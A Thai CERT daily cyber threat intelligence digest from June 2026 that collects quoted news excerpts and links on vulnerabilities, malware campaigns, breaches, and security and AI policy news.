Cyber Threat Intelligence 15 June 2026

NCSA_THAICERT

Vulnerabilities

Chrome 149 Update Patches 28 Vulnerabilities
"Google on Thursday rolled out a Chrome 149 update that resolves 28 critical and high-severity vulnerabilities. The update patches five critical-severity bugs: use-after-free issues in Core, DigitalCredentials, and WebMIDI, an insufficient validation of untrusted input flaw in Accessibility, and a heap buffer overflow defect in GPU. The remaining 23 vulnerabilities are high-severity flaws: nine use-after-free, four insufficient validation of untrusted input, three inappropriate implementation, two insufficient policy enforcement, two out-of-bounds read, an out-of-bounds write, a race condition, and a heap buffer overflow."
https://www.securityweek.com/chrome-149-update-patches-28-vulnerabilities/
CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2026-35273 Oracle PeopleSoft Enterprise PeopleTools Missing Authentication for Critical Function Vulnerability"
https://www.cisa.gov/news-events/alerts/2026/06/12/cisa-adds-one-known-exploited-vulnerability-catalog
https://securityaffairs.com/193574/security/u-s-cisa-adds-oracle-peoplesoft-enterprise-peopletools-flaw-to-its-known-exploited-vulnerabilities-catalog.html
Marking Your Own Homework (Check Point Remote Access VPN IKEv1 Authentication Bypass CVE-2026-50751)
"It is yet another day in this parallel universe of security, where the devices we bolt onto the edge of our networks to keep the bad people out are, with remarkable consistency, the exact thing that let the bad people in. While we’ve seemingly had a breather from traditional SSL VPN exploitation season (you know, the one where every edge appliance vendor takes it in turns to have a very bad week), it’s now time to pull up a chair and welcome ourselves back to another group therapy session."
https://labs.watchtowr.com/marking-your-own-homework-check-point-remote-access-vpn-ikev1-authentication-bypass-cve-2026-50751/
https://www.helpnetsecurity.com/2026/06/12/cve-2026-50751-poc-exploit/
Microsoft Has Mostly Repaired Flaw In Surface Hardware That Allowed Unprotected Devices To Be Bricked By a Single Packet
"For the past 90 days, Microsoft has been quietly patching a firmware flaw in Surface devices that allowed the hardware to be bricked with a single packet, though only for those who have disabled Secure Core and Secure Boot. And the company's Copilot AI software inadvertently helped identify the faulty firmware. According to Jack Darcy, a security researcher based in Australia, his instance of Microsoft Copilot stumbled across the bug after being asked to adjust the screen backlighting on a Surface device. The Copilot-conjured Python script ended up rendering the researcher's laptop inoperable by overwriting the embedded controller firmware."
https://www.theregister.com/security/2026/06/12/microsoft-has-mostly-repaired-flaw-in-surface-hardware-that-allowed-unprotected-devices-to-be-bricked-by-a-single-packet/5253895
21,786 Home Cameras, No Password, No Warning
"In May 2026, Mysterium VPN queried a public internet-wide device index to count every camera and recorder that answers the open internet. They found more than three million reachable devices. Of those, 21,786 were streaming live video to anyone who pointed a browser at them, with no login, no challenge, and no warning to the person on the other side of the lens. That number is a floor, not a ceiling. Two brands dominate the internet-reachable camera market: Hikvision and Dahua together account for most of the three million. But the headline figure isn’t about them."
https://securityaffairs.com/193536/hacking/21786-home-cameras-no-password-no-warning.html

Malware

Over 400 Arch Linux Packages Compromised To Push Rootkit, Infostealer
"More than 400 packages in the Arch User Repository (AUR) are distributing a Linux rootkit and infostealer malware targeting credentials and access tokens. A report from the open-source intelligence community Independent Federated Intelligence Network (IFIN) notes that a new maintainer is spoofing a trusted publisher on the AUR platform to push infected packages. The Arch Linux distribution is popular among power users and developers, using the AUR catalog to provide the latest versions for installed software, drivers, and the kernel."
https://www.bleepingcomputer.com/news/security/over-400-arch-linux-packages-compromised-to-push-rootkit-infostealer/
https://discourse.ifin.network/t/400-aur-packages-compromised-with-infostealer-and-rootkit/577
https://thehackernews.com/2026/06/over-400-arch-linux-aur-packages.html
Borrowed Trust – Systematic Exploitation Of Abandoned Cloud DNS Delegations To Serve Thai Gambling SEO Content
"Cyble Research & Intelligence Labs (CRIL) has identified an active SEO poisoning campaign exploiting abandoned cloud DNS zone delegations to serve Thai-language gambling content under the domain authority of reputed enterprise organizations. The campaign has compromised 163 organizations across 30+ countries, spanning federal government agencies, national healthcare systems, financial institutions, critical infrastructure operators, and major universities."
https://cyble.com/blog/borrowed-trust-cloud-dns-takeover-thai-gambling-seo-poisoning/
Atomic Arch: Attackers Hijack Trusted AUR Packages To Deliver Rootkit-Like Malware
"Sonatype researchers uncovered Atomic Arch, a new campaign targeting orphaned packages in the Arch User Repository in which attackers take over legitimate, abandoned AUR projects and modify PKGBUILDS to install a malicious npm package during installation. This is especially concerning because the trusted package itself may not look obviously malicious. The attack hides behind build instructions, downstream dependencies, and existing developer trust."
https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency
https://thehackernews.com/2026/06/400-arch-linux-aur-packages-hijacked-to.html
https://hackread.com/atomic-arch-hijacks-linux-aur-packages-malware/
Velvet Ant’s Operation Highland: How a China-Nexus Actor Infiltrated An Internal Network Undetected
"When Sygnia’s IR team began reconstructing the intrusion that would become known as Operation Highland, the earliest forensic artifacts dated back to 2016. What they uncovered was not a recent breach but a near-decade of undetected presence inside an internal network – a network the attacker had no direct path into, and reached anyway. Velvet Ant is a China-nexus threat actor Sygnia has tracked across multiple investigations. This is not an isolated campaign. In earlier research, we documented the group abusing F5 BIG-IP appliances and legacy Windows infrastructure to maintain long-term persistence. More recently, we reported on their exploitation of CVE-2024-20399, a zero-day in Cisco NX-OS, to deploy a hybrid backdoor (VELVETSHELL) directly on Cisco Nexus switches, and published a detailed advisory with detection and prevention guidance. The pattern across all these investigations is consistent: Velvet Ant escalates when detected, pivots to less-monitored infrastructure, and rebuilds persistence from a new vantage point."
https://www.sygnia.co/blog/operation-highland-velvet-ant/
https://thehackernews.com/2026/06/china-linked-hackers-backdoored-linux.html
https://www.bleepingcomputer.com/news/security/chinese-hackers-hijack-auth-flow-spy-on-isolated-network-for-a-decade/
LABScon25 Replay | Gamaredon x Turla: Unveiling a 2025 Espionage Alliance Targeting Ukraine
"In this LABScon 25 presentation, ESET researchers Matthieu Faou and Zoltán Rusnák present the first technical evidence that Gamaredon actively facilitated Turla’s access to high-value Ukrainian targets in Ukraine. Across incidents observed between February and June 2025, Gamaredon tooling, including PteroGraphin and PteroOdd, was used to deploy Turla’s Kazuar backdoor and, in at least one case, restore Turla’s access after the group appeared to have lost its foothold."
https://www.sentinelone.com/labs/labscon25-replay-gamaredon-x-turla-unveiling-a-2025-espionage-alliance-targeting-ukraine/
Shai-Hulud Campaign Evolution: Miasma, Hades, And AI Scanner Evasion
"Since Zscaler ThreatLabz published its analysis of Shai-Hulud V2 in November 2025, the campaign has continued to evolve in ways that distinguish it from more typical software supply chain attacks. Over the last six months, the activity expanded beyond npm into the Python Package Index (PyPI), shifted from maintainer-focused compromise to CI/CD abuse, undermined trust in Supply-chain Levels for Software Artifacts (SLSA) provenance and OpenID Connect (OIDC)-based publishing workflows without breaking their underlying cryptographic guarantees, extended execution into IDE configuration files, and introduced prompt injection designed to evade AI-based security scanners."
https://www.zscaler.com/blogs/security-research/shai-hulud-campaign-evolution-miasma-hades-and-ai-scanner-evasion

Breaches/Hacks/Leaks

Pharma Giant Novo Nordisk Discloses Breach Of Clinical Trials Data
"Danish pharmaceutical giant Novo Nordisk, the world's largest producer of insulin, disclosed a data breach affecting patient information from some clinical trials. Founded in 1923, Novo Nordisk now employs around 67,900 people across 80 offices worldwide and is the maker of viral GLP-1 receptor agonist drugs Wegovy and Ozempic. The company revealed on Thursday that attackers gained access to its internal IT systems and data related to patients participating in some clinical trials, including their patient IDs (random alphanumeric strings) and information on trial participation, sex, year of birth, biomarkers, health/immunogenicity data, and lifestyle factors (e.g., smoking, alcohol use, BMI)."
https://www.bleepingcomputer.com/news/security/pharmaceutical-giant-novo-nordisk-discloses-security-breach/
https://www.theregister.com/security/2026/06/12/novo-nordisk-says-hackers-stole-clinical-trial-data/5254812
https://www.bankinfosecurity.com/ozempic-drug-maker-loses-clinical-trial-data-in-hack-a-31962
Over 73,000 French Govt Employees Affected In Tchap Messenger Breach
"The French government revealed that a recent breach of its Tchap encrypted messaging platform affects the accounts of over 73,000 employees in the French public sector. DINUM, the French government's digital affairs directorate, disclosed on Monday that a threat actor gained access to the Tchap platform using a compromised user account and notified France's data protection authority (CNIL) due to the potential exposure of personal data shared by some users. While it initially shared almost no details about what was exposed and how many people were affected by this breach, the DINUM disclosed in a subsequent update that the attackers may have accessed information shared by around 9% of all registered users on the platform."
https://www.bleepingcomputer.com/news/security/french-govt-says-tchap-breach-affected-over-73-000-accounts/
Iranian Cyber Group Handala Claims Cal Water Hack
"The Iran-linked threat actor Handala this week boasted to have hacked California Water Service (Cal Water), and published 5 gigabytes of data allegedly stolen from the US water utility. In a post on their blog, the hacking group said the intrusion was retaliation for recent US actions in Iran and claimed they had the ability to disrupt water access but chose not to. While the level of access Handala had has not been confirmed, threat intelligence company Dataminr says the threat actor likely hacked into Cal Water’s RTKBase instance, a GNSS base station platform, and then moved laterally to a billing system."
https://www.securityweek.com/iranian-cyber-group-handala-claims-cal-water-hack/
https://securityaffairs.com/193565/uncategorized/iran-linked-handala-breached-a-california-water-utility-it-could-have-done-worse-and-it-knows-that.html

General News

Ukrainian National Pleads Guilty To Role In Conti Ransomware Operation
"A Ukrainian national extradited from Ireland to the United States last year has pleaded guilty to conspiracy charges tied to the Conti ransomware operation. The U.S. Department of Justice announced Thursday that 44-year-old Oleksii Oleksiyovych Lytvynenko pleaded guilty to conspiracy to commit wire fraud for his role in Conti ransomware attacks conducted between 2021 and 2022. According to prosecutors, Lytvynenko and his co-conspirators deployed Conti ransomware on victim networks in the United States and abroad, stealing data and encrypting devices to extort Bitcoin ransom payments."
https://www.bleepingcomputer.com/news/security/ukrainian-national-pleads-guilty-to-role-in-conti-ransomware-operation/
https://cyberscoop.com/conti-ransomware-member-ukrainian-lytvynenko-guilty/
https://hackread.com/extradited-ukrainian-admits-conti-ransomware-attacks/
https://securityaffairs.com/193590/uncategorized/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme.html
Google Sues Chinese Phishing Service Over Gemini Abuse
"Google has sued a Chinese phishing-as-a-service provider Friday for providing tools and crash courses for using the company's artificial intelligence product to create more than a million scam websites. The cybercrime group used Google's AI coding agent Gemini to refine and customize phishing sites so they look as real as the original, tricking victims to input their credit card information, account credentials and other personal data, the company said."
https://www.bankinfosecurity.com/google-sues-chinese-phishing-service-over-gemini-abuse-a-31957
https://www.helpnetsecurity.com/2026/06/12/google-china-based-cybercrime-network-lawsuit/
How To Use NIST And ISO Frameworks To Govern AI Agents
"Security leaders no longer need convincing that AI agents introduce risk. What’s missing is how to govern them once they move into production and begin operating autonomously across enterprise environments. AI agents already read sensitive documents, invoke internal APIs, trigger workflows, and make decisions that still require human judgment. From a security perspective, the most important shift is not their intelligence, but their behavior and intent, since they carry delegated authority, operate autonomously, and often hold more access than the humans they support."
https://www.helpnetsecurity.com/2026/06/12/nist-iso-frameworks-govern-ai-agents/
The Assembly Line Behind 1.5 Million Malicious Domains
"Attackers registered roughly 1.5 million malicious domains during the first five months of 2026. The registration patterns resemble industrial output. Most of the domains were created by attackers, put to use within weeks, and concentrated among a small set of registrars, top-level domains, and hosting providers. New research examined more than 1.5 million unique domains flagged on VirusTotal between January and May 2026. Each domain was flagged by at least five independent VirusTotal scanning engines and first appeared on the platform during the study window. The detections were combined with WHOIS registration records, passive DNS resolution data, and the Tranco popularity ranking of well-known sites."
https://www.helpnetsecurity.com/2026/06/12/malicious-domain-registration-research/
https://arxiv.org/pdf/2606.11111
AI Sovereignty Makes Data Centers Strategic Targets For Cyber Operations
"Data centers built for frontier AI draw hundreds of megawatts of electricity and large volumes of cooling water from fixed locations with known addresses. Each one concentrates tens of thousands of graphics processors, liquid cooling systems, and high-density power equipment inside a single building. This physical footprint turns a nation’s AI capability into something an adversary can locate, measure, and degrade."
https://www.helpnetsecurity.com/2026/06/12/ai-sovereignty-data-centers/
https://arxiv.org/pdf/2606.07245
Over 80% Of Sports Organizations Targeted By Hackers In The Last Year
"Over 80% of professional sports organizations were targeted by cyber-attacks during the last year and over half of them were hit more than once, researchers have warned. In a report published on June 11, the day the FIFA World Cup 2026 kicked off, figures from Darktrace revealed that 84% of sports organizations – including teams, venues and event bodies – were targeted by cyber-attacks during the last year. And for most of them, facing a cyber-attack was not a one-off event: 57% experienced multiple cyder incidents in the 12-month period."
https://www.infosecurity-magazine.com/news/sports-organizations-targeted-by/
How We're Combatting AI Scams With Security, Legislation And More
"You’ve seen the texts: fake package alerts, urgent bank warnings, panicked messages about your compromised account. Behind them is an AI-powered cybercrime network built to steal your passwords and credit cards. Today, we’re fighting back. We’re filing a lawsuit to dismantle their infrastructure, coordinating with the FBI who will be taking law enforcement actions, and will continue to work with AT&T, T-Mobile and Verizon to block these texts before they reach you. Litigation alone won’t end this. So Google is also advocating for federal legislation to make these protections permanent."
https://blog.google/innovation-and-ai/technology/safety-security/combatting-ai-scams/
https://thehackernews.com/2026/06/google-sues-chinese-smishing-network.html
https://www.theregister.com/security/2026/06/12/google-fires-sueball-at-alleged-chinese-phishers-over-ai-powered-fraud-ops/5254841
https://cyberscoop.com/outsider-cybercrime-network-takedown-china-fbi-google-lumen/
Statement On The US Government Directive To Suspend Access To Fable 5 And Mythos 5
"The US government, citing national security authorities, has issued an export control directive to suspend all access to Fable 5 and Mythos 5 by any foreign national, whether inside or outside the United States, including foreign national Anthropic employees. The net effect of this order is that we must abruptly disable Fable 5 and Mythos 5 for all our customers to ensure compliance. Access to all other Anthropic models will not be affected."
https://www.anthropic.com/news/fable-mythos-access
https://www.bleepingcomputer.com/news/security/us-gov-asks-anthropic-to-ban-foreign-national-access-to-fable-mythos/
https://thehackernews.com/2026/06/us-orders-anthropic-to-suspend-fable-5.html
https://www.bankinfosecurity.com/us-pulls-plug-on-anthropics-top-ai-models-a-31964
https://cyberscoop.com/us-government-anthropic-fable-5-mythos-5-export-controls/
https://www.securityweek.com/anthropic-says-it-has-taken-its-latest-ai-models-offline-to-comply-with-new-export-controls/
https://securityaffairs.com/193579/ai/washington-pulled-the-plug-on-anthropic-fable-5-and-mythos-5-models.html
Tracing Digital Intent: New MacOS Tahoe 26 Artifact Discovered
"Forensic examiners are constantly hunting for data that reveals not just what happened on a system, but the user's intent behind it. With the release of macOS Tahoe 26, a new artifact has surfaced that provides exactly this level of granularity. We have identified a new Biome stream, App.MenuItem, which logs specific menu selections made by users across the operating system. This artifact offers a step-by-step record of user actions — from compressing files to emptying the trash — providing critical context for user activity across the operating system. This blog outlines where to find this artifact, how to process it and what stories the data can tell."
https://unit42.paloaltonetworks.com/new-macos-artifact-discovered/

อ้างอิง
Electronic Transactions Development Agency (ETDA)